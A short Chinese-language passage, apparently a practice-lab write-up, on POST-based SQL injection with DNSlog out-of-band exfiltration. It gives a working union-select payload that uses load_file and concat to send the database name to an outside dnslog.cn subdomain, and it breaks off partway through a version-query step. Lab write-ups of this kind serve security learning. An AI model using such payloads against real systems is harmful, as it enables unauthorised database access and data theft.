post提交DNSlog注入
第十六关和和十五关大差不大,可以使用布尔注入,时间盲注等,只不过闭合方式不一样,但是用布尔和时间盲太过于消耗时间,本次测试我将使用dnslog注入。
使用在线平台http://www.dnslog.cn/
闭合方式,注入点,列数
通过尝试各种闭合方式确定闭合方式为")
,具体方式可以参考我前面几篇文章。
列数通过union select 1,2一次递增后面的数字来尝试,得到有两列
进行注入
构造语句:
- uname=zzz") union select 1,load_file(concat(“//”,(select database()),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
得到数据库名
版本
uname=zzz")